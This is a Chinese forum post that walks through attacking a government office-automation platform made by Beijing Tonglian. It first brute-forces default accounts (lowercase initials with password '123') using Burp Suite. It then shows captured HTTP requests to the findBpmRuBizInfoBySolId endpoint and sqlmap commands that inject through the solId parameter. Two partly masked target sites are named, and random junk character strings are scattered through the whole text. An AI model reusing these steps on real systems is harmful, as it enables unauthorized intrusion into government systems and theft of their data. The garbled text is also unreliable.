|
1 R0 W: [# w' f& y a; x" s
! ]# y6 G; ^* B) W) z9 t# \
1 A+ M. X' c2 W# R& I
/ N" ` c7 H$ w3 d5 ^4 J 平台简介:
6 e3 X' P- v% l3 {+ N& n d
8 \. v% w% t5 {0 f( m& ^
7 X4 L% X1 G5 I
. ]% @: E2 q" E/ U ) \2 j- ^3 [: F8 y( Q) g
0 `1 u. Z$ ?+ {) O l) @ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. S$ ]- R8 O+ l5 m) N7 P, {- T同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
. k5 m, ]/ v. r% n5 |+ M9 V
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!9 U/ w& V6 Z9 A# y# N, G- o% `
: E( {! n/ N) q
s. c4 J# M3 Z( g$ `) a0 ?
+ [ o* v5 B0 \ T7 e . S: U B0 [8 U! i+ c. v0 B& Z/ J4 A; D
* |8 D' ~) t( f2 w$ t5 _$ {, ^
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
5 u4 B: D, N# a# h; S5 H; t6 b8 R & |9 `- q4 l, a9 R& [: Y3 Y% `
7 z1 y: I0 F& E' {8 R # ^5 p1 t, ~ o- d
+ T# c3 ?. {. F0 T! p' H/ f& U* q8 t7 K
: x! r- K* _. `# q# N. } http://1.1.1.1:7197/cap-aco/#(案例2-)+ w3 h+ a' u5 ]$ P/ }& k: h
: k7 d e7 k4 V' T. q
) S/ }9 Q4 A: p4 t4 d http://www.XXOO.com (案例1-官网网站)4 r) ^; o2 ~- D- c9 B
3 f2 D# m/ D, U8 m
8 }' J& _% w2 _) ]' `# A5 }" B0 k + W% p$ l1 Z5 C! \" ~
: @$ b: G. D8 ? W- P
; L/ Q6 P2 l6 t( z2 D' ] 漏洞详情:
9 O6 Q/ ^5 W! ^0 k& m 7 _" ~* A0 C4 t5 ^5 p u
4 m8 x( _( C- G/ R% i! {) u- \ 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试* n$ e+ h1 f7 T" M7 U: y+ a
' x* @2 r5 h0 u2 }5 `9 {
; ^- u. u! y( m+ E2 y5 B. } 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
" {7 \& f$ N6 y: {
) I; n! x; ^; o2 S% V+ t; X2 G/ l& t; b0 y# D, m% t
7 n, U i0 N( J! }
& I1 j9 f w! @( V2 m
- i8 l$ ]( D9 i# o, R5 }  7 K2 j; I6 c; ?5 B& [
( h8 }% X: g. ]# p) Y0 t; x" M; R+ H" z2 L8 y. s/ T
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
) ? B/ c/ B& a% J( _1 P ' T2 |) z+ X {2 B! i
T [! n+ @1 M6 L# ^; D 1、案例1-官方网站
4 N$ Y4 B3 p/ ~+ T
( i& `( K( S/ S+ ^
7 S8 |. y1 g. N2 p GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
* k# k) _! U f. }9 W) B 9 P* W. l3 i3 @7 X6 p/ V, d
{+ _1 `# q' C. p& a+ B, M Host: www.XXOO.com q5 D6 `* V# |" N5 }+ h: s6 m
, d- {1 R( c$ |4 M4 P; t, F$ k8 L
4 a$ A$ y |& S Proxy-Connection: Keep-Alive w* G1 B$ g! `! E; Z
4 r: ?& q& I6 r* q) t0 [+ z
2 C& W5 Q! }& F2 a0 y$ q0 P) i' t Q
Accept: application/json, text/javascript, */*; q=0.01. I$ a8 R' x" J# x
; }9 q) Q, j) b4 j# ~+ s6 s& V4 r/ c2 Z7 l' N2 \# H4 Y
Accept-Language: zh-CN
; x) V- \' M) @4 l6 `! j% v! N } ! |2 a% ?9 v6 H8 G0 b
0 C- X- N! \: o1 v$ V5 T
Content-Type: application/json
; z" @# |4 W- ?) h: n4 I 5 L' r8 J5 B; b8 y7 \
' ?- E2 _8 s! S: j
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko7 L ^( e9 z8 L9 B
5 f: @) h7 U7 Q# H
; p+ c- e# {7 f0 p' q
X-Requested-With: XMLHttpRequest
4 J" {' ^6 q' }. H! t
/ Y( w& B% z0 e, L: ]$ I/ o7 ]% A. X
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0024 u2 x" c% q; x( W5 O) @6 v
l' c- m( t$ A! H4 ]( B
" n4 m) }- w/ y3 W0 `7 b Accept-Encoding: gzip, deflate, sdch
. F9 V- ^: x, m6 u9 ^ " C- c+ r9 {+ o0 W# @5 N* j7 Z
" h' h4 ^. y7 L" ^( r
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
4 T6 k8 O6 x( W+ g
# j) ~5 `$ f! A \$ d4 N6 S( y( Q" U+ u3 e, i8 z& |; \
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:6 Y" {& t! T; @
# Z! p, S' V# j) |. p& Q/ T4 E! l% ^7 H2 P. o
 * E& c7 U+ u2 F- B9 G
& v4 r' s& ~ Z( G) o+ f$ `; X
. P* _7 F9 m6 Q2 j. B# a 
" N% [! I& E, l2 k% Q* S. I
/ x, G: s7 t, V! v2 k0 i3 J2 u
) d/ \) K. t0 G4 F
% _0 z2 {& |; e& K
! b, a n/ F3 G! H# X, ?
6 s6 ~7 A! s0 T( R3 ~+ _: ` 5 r) E: j" Q; ]5 i
0 s2 u, Q4 n& H+ w; } 5 k# I' W* Z4 A# G
) i1 o6 d3 f- a
% E" O" Z7 r4 j( ` f 2、案例2-某天河云平台, f# ~, Z! e5 C- F+ U: }
2 Z8 a4 ^; ]6 ^. f" L$ E
; J2 t4 ^6 e% B6 G5 r2 ?* Y GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1" D$ k+ ^2 w+ M- I4 u
/ m f9 S+ g: y. y/ l- Y4 J" ~; x. I6 r3 u, p6 ]2 X4 Y
Host: 1.1.1.:7197
+ Y8 U: y/ j4 p( w0 E% V 4 J: o* v ]7 {' R4 s& K& h: y4 u
7 z" i$ a/ w* }8 r; ?0 l
Accept: application/json, text/javascript, */*; q=0.010 U$ o Q- g/ Q
, c% }0 L+ @" E/ Q( a
5 j% ~$ A* T# ^/ `, E X-Requested-With: XMLHttpRequest
7 a) ?8 F2 Y: t- o! ~. ~
% D+ a9 O. o6 E; W& Z
" t% r9 {; @. I2 K User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
% D, ~2 _! ]# `6 i# d% F7 w
9 A O8 F7 X H" B1 S1 K' Z1 ?2 o" I0 {4 @
Content-Type: application/json" V, n& b: y) J' m( j
7 Z/ a; ~% v; s! h& r8 ?# g/ x1 x0 t8 I- F( T
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10086 t1 g+ A, `& Q6 ?1 p( m- f6 D
. A% D, K1 z9 t* X
$ h7 J6 Y1 `* z. |$ ~& e Accept-Language: zh-CN,zh;q=0.8: r( \3 \6 }9 r( h* g
6 Q) w* O: o2 s5 E
8 K! o" ]: D# W3 I Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 }5 W9 t+ W8 ]2 }
1 X' X7 }9 t) A! D2 f( `
) s7 k4 \& {0 ` V$ V" V \) Q Connection: close
9 ~) ^: A, M5 J1 L ; Z& y# W J" @% J; k
7 u- W+ C/ Y* v8 U 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
% K6 {* b5 }; L5 D3 y* F
% H1 Q4 A2 P1 d0 I+ [4 A7 M, ]& g' h7 \1 q6 z* M1 x( Y6 n" D6 ~
* D& \" _- A3 U& _! w3 b- ?' X8 c 6 s% X( Z( v) D/ E0 ^
5 E8 u1 S9 E0 C* X% ~+ ? @
, Z. | b2 I& U6 w9 l) v( U
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对